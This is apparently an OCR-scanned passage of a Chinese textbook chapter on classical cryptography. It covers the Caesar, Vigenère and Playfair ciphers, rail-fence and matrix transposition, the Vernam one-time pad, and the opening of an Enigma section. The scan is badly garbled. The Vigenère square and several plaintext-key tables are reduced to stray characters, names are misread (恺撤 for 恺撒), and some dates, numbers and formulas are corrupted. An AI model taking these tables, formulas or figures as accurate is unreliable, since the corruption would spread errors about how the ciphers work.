藏匿 着 关于 角 山 隐 修 会 乃至 整个 基督 教 的 最 大 秘密 。 要 打开 密码 简 , 必 须 解 开 一 个 五 位 
数 的 密码 。 密 码 简 上 有 5 个 转盘 ,每 个 转盘 上 有 26 个 字母 ,可 能 作为 密码 的 排列 组 合 多 
3 11 881 376 种 。 达 。 芬 奇 密码 简 上 安装 有 字母 拨号 盘 . 当 拨号 盘旋 转 到 特定 位 置 拼 出 
正确 口令 时 ,密码 简 就 会 自动 分 成 两 半 。 寄 信人 在 使 用 这 种 密码 简 时 ,需要 事先 将 写 有 秘 
密 消 息 的 草 质 信纸 和 一 小 瓶 醋 同 时 放 进 简 内 。 如 果 密 码 简 被 强行 砸 破 ,里 面 的 醋 瓶 子 就 
会 破裂 ,流出 来 的 醋 将 使 信纸 立即 溶解 ,信纸 上 的 信息 就 会 消失 。 密 码 简 的 这 种 设计 可 以 
有 效 防止 暴力 破解 。 


2-8 达 . 芬 奇 发 明 的 密码 简 
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从 上 述 的 故事 中 可 以 体会 到 ,密码 的 发 展 史 与 人 类 的 文明 史 相 生 相 伴 。 人 类 文明 的 
发 展 史 就 是 一 部 密码 的 演化 史 。 从 古人 类 采用 的 符号 标记 ,到 古文 字 的 形成 和 解读 ;从 宗 
教 图 案 中 的 隐喻 ,到 古代 隐 写 术 ; 从 古 希 腊 的 斯 巴 达 密码 棒 , 到 达 。 芬 奇 密码 简 设 计 , 古 人 
们 这 些 五 彩 斑 澜 的 创新 和 杰作 ,无 不 体现 了 古人 在 秘密 传递 上 的 智慧 ,给 现代 人 留 下 了 宝 
贵 的 财富 ,并 一 步 一 步 地 将 密码 学 推 向 了 以 数学 为 基础 的 古典 密码 的 时 代 。 


2.1.2 ”古典 密码 


古典 密码 有 着 悠久 的 历史 。 虽 然 这 些 密码 大 都 比较 简单 ,很 容易 破译 ,现在 已 经 很 少 
恺 撒 密码 ”采用 ,但 是 研究 这 些 密码 的 原理 ,对 于 理解 .构造 和 分 析 现 代 密 码 都 是 十 分 有 益 的 。 

提起 古典 密码 ,就 必须 提 到 一 个 人 ,此 人 就 是 古 罗 马 的 将 军 和 独裁 者 盖 乌 斯 。 尤 利 乌 
斯 .已 撤 ( 公 元 前 100 一 公元 前 44 年 )。 恺 撤 大 帝 是 一 位 伟大 的 历史 学 家 和 作家 ,不 仅 可 
以 用 拉丁 文 和 希腊 文 写作 ,而 且 也 热衷 于 密 写 术 。 他 在 高 卢 地 区 参加 竞选 时 ,采用 字母 代 
换 的 方法 给 罗马 的 同事 和 朋友 写 了 密 信 , 这 是 历史 上 第 一 个 有 记载 的 密码 体制 。150 年 
后 ,史学 家 苏 维 托尼 乌 斯 将 恺 撒 用 到 的 密 写 方法 写 和 他 的 著作 《罗马 十 二 帝王 传 》 
《Twelve Caesars) , 书 中 记载 了 恺 撤 曾 用 此 方法 对 重要 的 军事 信息 进行 加 密 。 后 来 ,密码 
学 家 们 又 发 明了 各 种 形式 的 代 换 密码 ,如 单 表 代 换 、 多 表 代 换 、 多 字母 代 换 等 。 虽然 这 些 
密码 看 似 简单 ,但 却 充 分 展现 了 人 类 无 穷 的 智慧 和 创造 性 。 


1. 代 换 密码 

(1) 单 表 代 换 一 一 恺 撤 密 码 

恺 撤 密码 (Caesar Cipher) 包 含 一 个 简单 的 字母 顺序 的 “ 移 位 ”>。4 字母 移 位 的 恺 撤 密 
码 字母 表 如 表 2-1 所 示 。 从 表 中 可 以 看 出 , 密 文字 母 表 向 前 移动 了 4 个 字母 ,因此 A 被 EE 
替代 ,M 被 Q 替代 ,以 此 类 推 。 


表 2-1 四 字母 移 位 恺 撒 密码 
明文 IAI|IBICIDIEIFIGIHII|JIKILIMINIO|IPIQIRISITIUIVIWIX|Y|Z 


窗 文 | E | FIGIHITIJIKILIMINIOIPIQIRISITIUIVIWIXIYIZIAIB|ICID 


如 果 明 文 信息 为 : REINFORCEMENTS ON THE WAY 

那么 密 文 信息 为 : VIMRJSVGIQIRXW SR XLI AEC 

实际 上 ,不 一 定 移动 4 个 字母 的 位 置 , 也 可 以 移动 K 个 字母 位 置 。 广 义 的 恺 撤 密码 
指 移动 K 个 位 置 的 加 密 体 制 , 因 此 又 可 称 为 移 位 密码 。 如 果 将 26 个 字母 用 数字 0 一 25 
来 表示 ,采用 广义 恺 撤 密 码 加 密 的 过 程 在 数学 上 可 以 表示 为 

C —M -- K Cpmod 26) 
其 中 ,M 是 明文 字母 ,C 是 密 文字 母 ,K 是 密 钥 。mod 26 是 模 算 术 运 算 , 当 M CK 026 
时 ,就 减 去 26, 余 数 就 是 模 运 算 的 结果 。 密 钥 K 可 能 的 取 值 只 有 1 一 25, 即 密 钥 空 间 为 集 
合 {1,2,3,…,24,25} ,共有 25 个 元 素 。 因 此 ,这 种 加 密 方法 对 于 密码 专家 来 说 并 不 安 
全 。 在 已 知 语言 的 情况 下 ,车 猜 出 加 密 者 使 用 了 恺 撒 移 位 代 换 加 密 信息 ,那么 破译 者 采用 
穷 举 法 最 多 尝试 25 次 就 可 以 解密 。 
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(2) 多 表 代 换 一 一 维 吉 尼 亚 密码 

为 了 增加 密码 破译 的 难度 ,人 们 在 恺 撤 单 表 代 换 密码 的 基础 上 扩展 出 多 表 代 换 密码 ， 
最 有 名 的 当 属 “ 维 吉 尼 亚 密码 ”。 布 菜 斯 。 德 。 维 吉 尼 亚 (1523 一 1596 年 ) 是 法 国 的 职业 
外 交 家 。 他 在 罗马 任职 期 间 , 对 密码 学 产生 了 浓厚 的 兴趣 。 意 大 利 当 时 是 欧洲 的 密码 学 
研究 中 心 。 他 退休 后 ,出 版 了 一 系列 以 密码 学 为 主题 的 书 ,其 中 有 一 本 书 的 名 字 为 ( 密 写 
方式 的 数字 约定 》。 此 书记 载 了 许多 编码 和 密码 方法 ,其 中 包括 贝 拉 索 的 表格 法 。 法 国人 
维 吉 尼 亚 对 贝 拉 索 的 表格 法 作 了 改进 ,将 字母 表 扩展 到 265 26 ,发 明了 自动 密 钥 系统 进 
行 加 密 。 维 吉 尼 亚 密码 代表 了 密码 学 理论 发 展 的 一 个 转折 点 。 

有 趣 的 是 , 维 吉 尼 亚 密码 在 18 世纪 才 得 到 广泛 应 用 ,并 一 直 用 到 19 世纪 末 。 此 密码 
在 当时 被 公认 是 很 安全 的 , 曾 被 称 为 “不 可 破译 的 密码 ”。 维 吉 尼 亚 密码 的 基本 原理 很 简 
单 ,但 与 已 撤 密 码 相 比 ,其 加 密 过 程 就 稍 显 复杂 。 

维 吉 尼 亚 密码 的 加 密 的 过 程 描述 如 下 : 

第 1 步 : 构造 维 吉 尼 亚 多 表 代 换 字 母 表 方 阵 。 

将 26 个 字母 构成 的 字母 表 连 续 向 左 移 位 1 次 ,组 成 26 X26 的 字母 表 方 阵 。 方 阵 的 
第 一 行 是 明文 字母 , 方 阵 的 左边 第 一 列 按照 从 上 至 下 的 顺序 编号 ,如 表 2-2 所 示 。 


表 2-2 维 吉 尼 亚 多 表 代 换 字母 表 方 阵 


c d e f g h i j k | m n 0. p.-g r s . t. ab v Ww X y —z 
1 p[r[r[c[u[r[» [X[t [M[NTo[e [o[R[s[T[v|v [WEXT Y [Z] ^ 
2 E[F|G[H|T | [KU | M N[O]P[O|R|S[T[U| V| W[ XEX]Z[A]| B 
3 r|c[H|i |J [K[L| MN[|O|P|[O|R|S|T[U| V| V] X[ Y A[B|C 
4 G|H|1 |I |[K[L| MN[O[P[O|R[ÍS|T[U| V[W|X| Y[Z [A[B | C| D 
5 u|ir[|r[ikir[iMiv[oj|r[|o|n|sir]u|viwix|v|z[A]B|c|]p]|E 
6 u[r[r[|[Kk|t|M[N[o|P|o|[R|s|T|U|V| W| X] Y|Z|A| B EC] D|E]F 
7 r[1[K[t|M|N[Oo|P[O|R[S |T|U| V| W X] Y|Z|] A| B| CED]E|F | G 
8 j|K|t.|M|N|o]P[O|R|s|T|U|V| W X| Y Z| A] B| | PEE]F [G|H 
9 k[tL|M|N[o]P|o|R[s|T[U|V| W|X| Y|Z]A^|B|C|D|E | F] G HT 
10 L[M|N[o|P|Oo[|[R|s|T|U| V| W[ X YI[Z|A| B|CTD[E [T FG] H [1 |7 
11 M[|N|[o|P|o|R[s|T|U|V[| W|X| Y|Z|A|B|C|]D|E|F | GEH[T | | K 
12 N[o|P[o|R[s|T[|U|vV| W|x]v|z]^|B|c|p[E]|F | G] IET? | KTt 
13 o|P|o[nR|s|T|u|V|W|x|]v|z|A|B]|C|D|E|F | G| H|1 EE] KIL|M 
n P[o|R|s|T|U[|V|W|X|]Yv|]z|A]|B|C]|D|E]|F | G| H|T |? EK] - | M]N 
15 o|R[s[T[U|V|[W[x|v]z]aA|B|C|D]|E|F | G| HB] | [2 [K [E] M[ N[O 
16 R[s|T|U|vV| W[X[|v]z]A|B|C]|D|E|F | G| H]! | | Kt EM| N[ OT? 
17 S|TJUJVI|WIX|Y|ZJAJ|JBJ|JC|JD|EJF|JG|]|H]|LI J|K[L|MENJOJP|QO 
18 TulvlwxlvylzlAlslclplsElrflclalkg [M|N[O[P | Q[R 
» | z | K[IT|M|N[|o[P|O]R[S 
20 VIWIX|Y|IZIA|B|C|D|B|F|G|HJ|I J|KIL|M|NJOJ|JP R|[S|T 
21 w[x|v|z|A|B[c|p[rE|]r|[Ga|u|tr |] K[ L| M N[o|P|OQ]R|S|T|U 
22 XIYIZIAIBICIDIEIFIGIHII J|KI|L|M|NJ[OJPJQIR SS TI U|YV 
23 v[z|^]s|c]p[rE]|r|[ao]un[|1 | 7 [K]| L| MN|Oo|P|Q]|R|S | T|U| V| W 
24 z|^|B[c|p[E|F|G|H]|t | 2 KL] M N[|O|P|O|R[S|T [EU] V| W| X 
25 A|JBjJCJjJDJEJF|GJHJ|I J|KIL|MI|IN[OJPJQIR|S|T|JUEVAI W|X|Y 
26 B[c]|p]E|]F|G[H]T [| J[KIL] MI N]O]* [OG] RISTTI]UI VEWI X] YTZ 


第 2 步 : 由 “关键 字 " 决 定 选 择 哪个 代 换 表 。 
与 单 表 已 撒 移 位 密码 不 同 ,每 个 明文 字母 采用 维 吉 尼 亚 多 表 代 换 方 阵 均 有 可 能 产生 
26 个 潜在 的 密 文字 母 。 例 如 ,如 果 选 择 第 5 行 ,那么 明文 字母 a 就 被 加 密 为 F; 如 果 选 择 
第 22 行 ,那么 字母 a 就 被 加 密 为 W。 
现在 ,对 于 加 密 者 而 言 ,关键 是 如 何在 26 个 代 换 表 中 选择 一 个 代 换 表 进 行 明文 字母 
的 代 换 。 维 吉 尼 亚 通过 采用 “关键 字 ” 或 “关键 文本 ”来 决定 代 换 表 的 选用 顺序 。 这 个 “ 关 
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键 字 ?可 以 是 一 个 英文 单词 ,也 可 以 是 一 个 短语 ,或 者 是 一 串 数字 ,它们 就 是 后 面 即将 讲 到 
的 “ 密 钥 ”概念 的 锥 形 。 
例如 ,可 以 选择 被 加 密 的 机 密 信 息 为 “wait for attack command”,“ 关 键 字 ”选择 
"SECRET WORD”, 那 么 可 以 得 到 明文 -关键 词 对 应 表 , 如 表 2-3 所 示 。 


表 2-3 明文 -关键 词 对 应 表 


8x (qw wx] £]|o|x]|a]|*!)|t]|sxlej|t!|se!]so]|aej|$|s!|sj|d 


XSCEE S|E|C|R|E T[|W|O R|D|S|E|C|R|E|T W|O|R 


SX pEggxXI«-13x134-EF noD $1 EDL3X!IYXp)! HB NISLTJ|G|JJ) 


第 3 步 : 在 “关键 字 ? 控 制 下 对 明文 加 密 。 

关键 字 的 第 一 个 字母 S 对 应 密 钥 方 阵 的 第 19 行 , 则 明文 字母 w 被 P 替换 ;关键 字 的 
第 二 个 字母 EE 对 应 于 密 钥 方 阵 的 第 5 行 , 则 明文 字母 a 被 下 替换 。 以 此 类 推 ,得 到 加 密 
后 的 密 文 为 “PFLL JIO PLXTHN UTGJPFH", 

上 面 的 加 密 过 程 通过 查 表 的 形式 完成 。 其 实 可 以 将 查 表 法 转化 成 一 种 更 简单 的 方 
ik. 如 果 把 A~Z 的 26 个 英文 字母 编号 为 1 一 26 ,其 实 上 述 的 加 密 过 程 可 以 转化 为 模 26 
加 法 运算 ,如 表 2-4 所 示 。 

表 2-4 ”明文 -关键 词 对 应 表 


Hx |wlas|ilt|f|e|r|e|t|t|a|e|k|c|o|m|m|a|nj|d 


fü |23| 1| 9 |20/ 6 |15/18| 1 |20]20 1 | 3 |11| 3 | 15 | 13| 13] 1 | 14| 4 


Xütf S EI CIR|E TIWIOIR|DIS|EI|C|R|E| T[|W|O|R|D 


编码 |19|5 |3]|18/ 5 |20/23|15/18| 4 19 5 | 3 |18| 5 | 20|23 | 15 | 18| 4 


gx HEPIEFILILTIKIT|O|PILÓLX|TJIHIN|U,T|G,.T]|P|T)|EB 


mod26|16|6 |12/12|11| 9 |15|16 12/24 |20| 8 |14|21/|20| 7 |10|16 6 | 8 


为 了 破译 该 密 文 ,必须 知道 加 密 所 采用 的 关键 字 , 知 道 了 关键 字 , 解 密 只 需要 执行 与 

加 密 相反 的 模 运 算 。 例 如 ,要 对 第 一 个 密 文 字母 P 解 密 ,只 需要 做 加 密 的 逆 计 算 : 
16—19 mod 26—26-- (16—19) mod 26—42—19— 23 

运算 结果 为 23, 所 对 应 的 明文 字母 即 为 w。 为 了 进一步 提高 维 吉 尼 亚 密 码 的 安全 
性 ,有 两 种 选择 : 一 是 打 乱 表格 法 方 阵 的 逻辑 顺序 ,二 是 引入 更 加 复杂 的 关键 字 ,比如 可 
以 采用 与 明文 长 度 相同 的 字母 和 数字 组 合 。 在 实际 应 用 中 ,可 以 将 成 千 上 万 个 复杂 的 关 
键 字 收 集 起 来 编 成 册 , 就 形成 了 “密码 本 ”, 双 方 可 以 共享 此 密码 本 进行 保密 通信 。 

在 维 吉 尼 亚 密码 问世 的 300 年 后 ,一 个 叫 查尔斯 。 巴 贝 奇 的 英国 发 明 家 宣称 已 成 功 
破译 了 此 密码 。 巴 贝 奇 精通 密码 学 的 数学 基础 ,着 手 寻 找 可 能 出 现在 维 吉 尼 亚 密 文中 的 
重复 循环 。 他 通过 搜索 重复 的 密 文中 的 字母 串 而 推导 出 关键 字 的 长 度 。 应 英国 情报 部 门 
的 要 求 , 他 没有 公布 破解 维 吉 尼 亚 的 具体 方法 。 巴 贝 奇 的 破译 方法 不 可 避免 地 依赖 于 大 
量 的 比较 计算 ,为 此 他 还 发 明了 一 台 可 以 做 差分 计算 的 计算 机 。 
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维 吉 尼 亚 密码 的 优点 是 它 有 相对 复杂 的 密 钥 ,相同 的 字母 将 被 加 密 为 不 同 的 密 文 字 
母 , 增 加 了 破译 的 难度 。 它 的 缺点 依然 存在 ,如 果 密 文 足够 长 ,会 有 大 量 重 复 的 密 文 串 出 
现 ,通过 计算 重复 密 文 串 之 间 的 公 因子 ,分 析 者 可 能 猜 出 密 钥 的 长 度 。 

(3) 多 字母 代 换 一 一 普 莱 费 尔 密码 

普 莱 费 尔 密码 是 一 种 多 字母 代 换 密码 ,由 电报 机 的 发 明 者 之 一 查尔斯 . mp8 RE 
(1802 一 1875) 和 政治 家 莱 昂 。 普 莱 费 尔 档 士 (1818 一 1898) 于 1854 4E BJ Of 3E ED 0E 
莱 费 尔 倡 导 在 英国 军队 和 政府 部 门 使 用 。 查 尔 斯 . 惠 斯 通 是 英国 著名 的 物理 学 家 ,他 一 
生 在 电学 .光学 .乐音 等 多 个 方面 为 科学 技术 的 发 展 做 出 了 重要 贡献 。 莱 昂 。 普 莱 费 尔 是 
英国 的 科学 家 政治 家 ,他 曾 先后 在 圣 安 德 鲁 斯 大 学 .安德森 学 院 和 爱丁堡 大 学 学 习 , 后 在 
英国 政府 部 门 任职 。 因 普 莱 费 尔 在 推动 这 种 新 密码 的 普及 和 应 用 中 做 出 了 贡献 ,故人 们 
将 此 密码 以 他 的 名 字 命 名 。 

普 莱 费 尔 密码 的 基本 思想 是 : 将 明文 中 的 双 字 母 组 合作 为 一 个 单元 ,并 将 这 些 单元 
转换 为 密 文 的 双 字母 组 合 ,加 密 的 3 个 步骤 为 : 编制 密码 表 ; 整 理 明文 ;编写 密 文 。 

第 1 步 : 编制 密码 表 。 

普 莱 费 尔 算法 基于 一 个 5X5 的 字母 矩阵 ,该 矩阵 使 用 一 个 密 钥 构 造 而 成 : 从 左 至 
右 、\ 从 上 至 下 填 人 该 密 钥 的 字母 (去 除 重 复 字 母 ) ,然后 再 将 26 个 英文 字母 中 余下 的 字母 
以 字母 表 顺 序 填 人 矩阵 剩余 空间 ( 注 : 字母 1 和 J 被 算 作 同 一 个 字母 )。 例 如 , 当 关 键 词 
( 密 钥 ) 为 harpsichord( 一 种 15 世纪 至 19 世纪 初 用 的 键盘 乐器 ) 时 ,就 可 以 写 出 5X5 的 
矩阵 密码 表 , 如 表 2-5 所 示 。 

从 表 2-5 中 可 以 看 出 , 密 钥 表 共有 25 个 字母 ,I 和 表 2-5 普 莱 费 尔 密码 表 
丁 均 视 同 为 1。 先 填写 密 钥 字 母 ,去 除 重复 的 字母 ,再 
用 其 他 字母 补 齐 。 

第 2 步 : 整理 明文 。 

将 明文 消息 拆 分 为 成 对 的 二 合 字 母 ,每 个 二 合 字 
母 必 须 由 不 同 的 字母 组 成 ,如 果 两 个 同样 的 字母 同时 
出 现 一 个 二 合 字母 中 ,要 在 它们 之 间 插 入 一 个 x; 在 结 
尾 只 剩 下 单个 字母 的 情况 下 ,也 在 结尾 处 也 添加 一 个 
x。 例 如 明文 : help I really need somebody ,进行 明文 
整理 后 就 变 成 : he lp ir ea Ix ly ne ed so me bo dy. 

第 3 步 : 编写 密 文 。 

以 表 2-5 的 密 钥 表 为 参考 ,二 合 字 母 会 以 三 种 不 同方 式 进行 代 换 : 

CD 同行 代 换 规则 : 明文 字母 将 由 其 右边 的 字母 代 换 ,而 行 的 最 后 一 个 字母 由 行 的 第 
一 个 字母 代 换 。 例 如 ,ps 代 换 为 sh 。 

Q 同 列 代 换 规则 : 明文 字母 将 由 其 下 面 的 字母 代 换 ,而 列 的 最 后 一 个 字母 由 列 的 第 
一 个 字母 代 换 。 例 如 ,hv 代 换 为 ih。 

G 不 同行 不 同 列 代 换 规则 : 明文 第 一 个 字母 将 由 与 第 一 个 字母 同行 .与 第 二 个 字母 
同 列 的 字母 替换 ;明文 第 二 个 字母 将 由 与 第 二 个 字母 同行 .与 第 一 个 字母 同 列 的 字母 蔡 
换 。 例 如 ,明文 ns 代 换 为 密 文 ua。 
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根据 以 上 代 换 规则 ,明文 信息 经 过 代 换 加 密 后 得 出 的 密 文 如 表 2-6 所 示 。 
表 2-6 经 普 莱 费 尔 密 码 加 密 的 明文 - 密 文 对 照 表 


密 文 im ks oh fh gz kz mf ki rb vm id kp 


接收 者 解密 时 ,只 要 他 知道 关键 词 , 只 须 简单 地 将 以 上 加 密 过 程 反 向 进行 ,就 可 以 得 
到 明文 。 因 此 ,要 想 破译 该 密码 ,必须 要 猜 出 关键 词 是 什么 ,也 就 是 要 知道 密 钥 。 

在 电影 (国家 宝藏 2) 中 ,英国 女王 曾 向 美国 内 战 中 的 南方 同盟 写 过 两 封 关 于 黄金 城 
的 密 信 , 以 期 南方 同盟 获得 巨额 财富 ,从 而 战胜 北方 政府 ,其 中 ,第 二 封 信 就 是 用 普 莱 费 尔 
密码 加 密 的 。 普 莱 费 尔 密码 使 用 方便 , 且 可 以 令 英 文字 母 的 频 度 分 析 法 失效 ,因此 有 人 称 
它 为 “ 坚 不 可 破 ”的 密码 。 它 在 1854 一 1855 年 的 克 里 米 亚 战争 和 1899 年 的 布尔 战争 中 被 
广泛 应 用 ,直到 1915 年 的 一 战 时 期 才 被 破解 。 

虽然 普 莱 费 尔 密码 可 以 令 英文 字母 的 频 度 分 析 法 失效 ,但 仍然 可 用 二 合 字 母 的 频 度 
分 析 法 进行 破译 。 例 如 ,英语 中 有 很 多 最 常见 的 二 合 字 母 对 ,如 th、he、an、in、er、re、es 
等 ,通过 分 析 密 文 二 合 字 母 出 现 的 频 度 , 就 可 以 将 相同 频 度 的 密 文 二 合 字 母 与 明文 二 合 字 
母 相 对 应 ,从 而 破译 该 密码 。 


2. 置换 密码 

置换 密码 (Permutation Ciphers) 又 称 为 换 位 密码 (Transposition Ciphers) , 它 根 据 一 
定 的 规则 重新 排列 明文 ,以 便 打 破 明文 的 结构 特性 。 置 换 密码 的 特点 是 保持 明文 的 所 有 
字符 不 变 , 只 是 利用 置换 打 乱 了 明文 字符 的 位 置 和 次 序 , 也 就 是 说 它 改变 了 明文 的 结构 ， 
不 改变 明文 的 内 容 , 这 一 特点 与 代 换 密码 截然 不 同 。 置 换 密码 是 古典 密码 的 重要 一 员 。 
人 类 仅仅 通过 对 明文 字母 进行 重新 排序 ,就 可 以 实现 对 明文 的 加 密 。 虽 然 置换 密码 的 设 
计 思 想 简单 .但 它们 对 现代 密码 的 贡献 却 不 可 磨灭 。 

置换 密码 的 字母 置 乱 规则 有 很 多 种 ,根据 字母 置 乱 以 及 恢复 的 编码 规则 的 不 同 ,置换 
密码 可 以 分 为 栅 格 换 位 .矩阵 换 位 和 列 换 位 等 。 

CD 栅 格 换 位 

假如 明文 为 下 面 一 句 话 : 

Send the battle map to me before enemy troops come. 

我 们 可 以 采用 两 行 锯齿 形 排列 的 栅 格 ,将 以 上 明文 字母 按照 由 上 到 下 、 从 左 至 右 的 顺 
序 写 到 栅 格 中 ,如 图 2-9 Bron 


0 
9909000000000 001006 


四 2-9 ”两 行 栅 格 换 位 


按照 先 上 后 下 、 从 左 至 右 的 顺序 读 出 密 文 为 
SNTE ATE ATMBFR EEY RO SO EEDHBT LMPOE EOENMT OPCM 
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其 实 , 换 位 并 不 一 定局 限于 2 41 MIL o RT LUCK FH 4 行 栅 格 来 对 以 上 消息 加 密 , 如 
图 2-10 所 示 。 


2-10 ”四 行 栅 格 换 位 


按照 先 上 后 下 、 从 左 至 右 的 顺序 读 出 密 文 为 

SEEM RYS EHBLMO EOE MT PC NTATAT BFEER OOEDTP ENOM 

(2) 和 矩形 换 位 

假如 明文 为 下 面 一 句 话 

Launch hacker attacks to paralyze the target networks. 

可 以 构造 一 个 任意 维 数 的 矩阵 ,将 明文 消息 按 行 由 上 到 下 、 从 左 至 右 的 顺序 写 入 矩 
阵 。 例 如 ,可 以 构造 一 个 6X8 的 矩阵 ,并 将 明文 写 人 矩阵 ,如 图 2-11 所 示 。 


1 a u n c h h a 
c k e r a t t a 
c k s t o p a r 
a 1 y z e t h e 
t a r g e t n e 
t w o r k s 


图 2-11 6X8 换 位 矩阵 


按 列 由 上 到 下 、 从 左 至 右 的 顺序 读 出 密 文 如 下 : 

LCCATT AKKLAW UESYRON RT ZGRCAOEE KHT PTTSHT AHNAAREE 

其 实 , 许 多 换 位 方法 都 是 可 行 的 ,不 一 定 非 要 依次 按 行 填充 矩阵 ,再 依次 按 列 读 出 密 
文 。 也 可 以 沿 对 角 线 方向 ,或 按 螺旋 旋 进 和 旋 出 方向 ,或 其 他 任何 方式 读 出 密 文 。 对 于 解 
密 者 来 说 ,只 须 按 照 读 取 密 文 的 顺序 将 字母 填 回 矩阵 ,然后 按照 加 密 时 明文 填充 的 顺序 读 
出 即 可 。 

如 果 密 文 被 破译 者 截获 ,而 且 怀 疑 发 信者 采用 这 种 加 密 方式 ,那么 只 能 猜测 加 密 和 矩阵 
的 行列 数 。 因 密 文 有 46 个 字母 ,因此 破译 者 可 以 猜 出 的 加 密 矩 阵 有 很 多 ,例如 ,2 义 23， 
2X24,3X16, 4X12, 5X10, 6X8,7X7,8X6,10X5,12X4,16X3,24X3,23X2 等 。 


3. 弗 纳 姆 密码 
1917 年 ,美国 AT&T 公司 的 工程 师 弗 纳 姆 (Gillbert Vernam ) 为 电报 通信 设计 了 一 
种 非常 简单 易 行 的 密码 ,被 称 为 弗 纳 姆 密码 (Vernam Cipher) 。 
弗 纳 姆 密码 是 最 简单 的 密码 体制 之 一 。 若 假定 消息 是 长 为 ”的 比特 串 : 
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m —bjb;:-b, € (0,1)" 
那么 密 钥 也 是 长 为 n 的 比特 串 : 

k=kiksk, Evu{0,1}” 
(这 里 ,符号 “Eu? 表 示 均 匀 随 机 地 选取 &A) 。 一 次 加 密 一 比特 ,通过 将 每 个 消息 比特 和 相 
应 的 密 钥 比特 进行 比特 XOR( 异 或 ) 运 算 来 得 到 密 文 串 c 一 ctcz…cv 


c; —b, Q 
1<i<n, 这 里 ,运算 名 定义 为 
e | o 1 
0 0 1 
l1 1 0 


因为 名 是 模 2 加 ,所 以 减法 等 于 加 法 ,因此 解密 与 加 密 相同 。 

考虑 M 二 COK EE {0,1}", 则 弗 纳 姆 密码 是 代 换 密码 的 特例 。 如 果 密 钥 串 只 使 用 一 
次 ,那么 弗 纳 姆 密码 就 是 一 次 一 密 (one-time pad) 加 密 体制 。 一 次 一 密 弗 纳 姆 密码 提供 的 
保密 性 是 在 信息 理论 意义 上 安全 的 ,或 者 说 是 无 条 件 安全 的 。 理 解 这 种 安全 性 的 一 种 简 
单方 法 如 下 : 

如 果 密 钥 & 等 于 cm( 逐 比特 模 2 加 ) ,由 于 任意 m 能 够 产生 c ,所 以 密 文 消 息 串 < 
不 能 提供 给 窃听 者 关于 明文 消息 串 m 的 任何 信息 。 

一 次 一 密 弗 纳 姆 密码 也 称 为 一 次 一 密 密 码 。 原 则 上 ,只 要 加 密 密 钥 是 永 不 重复 的 真 
随机 数 , 那 么 任何 代 换 密码 都 可 以 看 作 一 次 一 密码 。 然 而 ,习惯 上 只 有 使 用 逐 比 特异 或 运 
算 的 密码 才 称 为 一 次 一 密 密 码 。 一 次 一 密 密 码 的 安全 性 完全 取决 于 密 钥 的 随机 性 。 若 密 
钥 是 真 随机 数 ,那么 产生 的 密 文 流 也 是 真 随机 数 。 

但 是 在 实际 应 用 中 ,一 次 一 密 密 码 存在 两 个 难点 : 

CD 产生 大 规模 的 随机 密 钥 有 困难 。 密 钥 流 的 长 度 必须 与 明文 的 长 度 相同 , 当 明 文 很 
长 时 ,提供 和 保存 这 种 规模 的 随机 数 是 相当 艰巨 的 任务 。 

@ 密 钥 的 分 配 和 保护 存在 困难 。 对 每 一 条 明文 消息 加 密 ,都 需要 给 发 送 方 和 接收 方 
提供 等 长 度 的 密 钥 。 因 此 ,大 量 密 钥 的 分 发 就 成 了 问题 。 正 是 因为 存在 以 上 困难 ,在 实际 
中 一 次 一 密 很 少 使 用 ,主要 用 于 对 安全 性 要 求 很 高 数据 传输 量 不 大 的 保密 通信 中 。 

与 其 他 代 换 密码 (例如 使 用 模 26 加 的 移 位 密码 ) 相 比 , 逐 位 异 或 运算 ( 模 2 加 ) 在 电子 
电路 中 更 容易 实现 ,因为 这 个 原因 , 逐 位 异 或 运算 被 广泛 应 用 在 现代 单 钥 加 密 算法 的 设计 
中 。 因 此 , 弗 纳 姆 密码 是 序列 密码 (Sequence Cipher) 的 雏形 。 序 列 密码 也 称 为 流 密码 
(Stream Cipher) ,在 今天 的 计算 机 和 通信 系统 中 均 得 到 广泛 应 用 。 

本 节 介 绍 的 这 些 密码 在 计算 机 发 明之 前 ,确实 很 难 破解 ,在 早期 的 军事 和 情报 领域 发 
挥 了 不 小 的 作用 。 但 是 , 随 着 计算 机 的 发 明 ,破译 这 些 古 典 密码 在 今天 看 来 是 轻而易举 的 
事情 ,但 是 古典 密码 的 设计 思想 仍然 对 现代 密码 的 设计 产生 了 不 可 磨灭 的 影响 。 古 典 密 
码 的 两 个 基本 工作 原理 一 一 代 换 和 置换 , 仍 是 构造 现代 对 称 密码 算法 的 最 重要 的 核心 技 
术 。 在 后 面 介绍 的 现代 对 称 密码 DES 和 AES 的 设计 中 ,仍然 可 以 看 到 代 换 和 置换 这 两 
个 基本 运算 的 影子 。 同 时 ,一 次 一 密 密 码 也 深远 地 影响 着 现代 序列 密码 的 设计 。 
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2.1.3. 机械 密码 
在 计算 机 发 明之 前 ,所 有 的 密码 编码 和 解密 都 要 通过 手工 进行 操作 。 这 样 做 的 缺点 Be 


ENIGMA 
很 多 ,一 是 容易 出 错 , 二 是 速度 太 慢 。 因 此 ,人 们 就 想方设法 采用 一 些 硬件 的 机 械 设备 取 。 密码 机 
代 繁 重 的 人 工 加 密 和 解密 操作 。 于 是 ,历史 上 便 出 现 了 许多 机 械 密码 机 ,这 些 机 械 密码 机 
设计 精巧 , 令 人 印象 深刻 。 最 具 代 表 性 的 当 属 二 战 时 期 的 ENIGMACENIGMA) 密 码 机 。 


本 节 主 要 介绍 ENIGMA 密码 机 的 设计 ,以 及 破译 ENIGMA 密码 机 的 故事 。 

1. ENIGMA 密码 机 

1918 年 ,德国 发 明 家 亚 瑟 。 谢 尔 乌 比 斯 (1878 一 1929 年 ) 出 于 商用 目的 发 明了 一 台 机 
械 密码 机 , 取 名 为 ENIGMA ,并 为 其 申请 了 专利 ,如 图 2-12 所 示 。ENIGMA 看 起 来 像 是 
一 个 装 满 了 复杂 而 精致 元 件 的 盒子 , 它 的 机 械 构造 相当 巧妙 , 令 每 一 个 深入 研究 
ENIGMA 的 人 赞叹 不 已 。 这 种 密码 机 很 快 就 吸引 了 德国 军 方 的 注意 。 在 之 后 的 十 几 年 ， 
其 编码 规则 设计 越 来 越 复杂 。 


扰 码 转盘 


050600060050 | 
Doooocoo005 


| 


反射 器 一 


900000009 | 


oo 
X 


图 2-12 ”ENIGMA 密码 机 及 插 接 板 设计 


据 英国 于 1923 年 出 版 的 关于 第 一 次 世界 大 战 的 官方 历史 资料 透露 ,德国 在 第 一 次 世 
界 大 战 时 ,其 加 密 的 消息 能 被 英 军 轻易 读 取 。 因 此 ,德国 军 方 意识 到 他 们 需要 使 用 一 个 更 
安全 的 加 密 系 统 。 军 方 让 公司 在 商用 机 基础 上 增加 了 更 复杂 的 设计 ,最 终 采 购 了 超过 3 

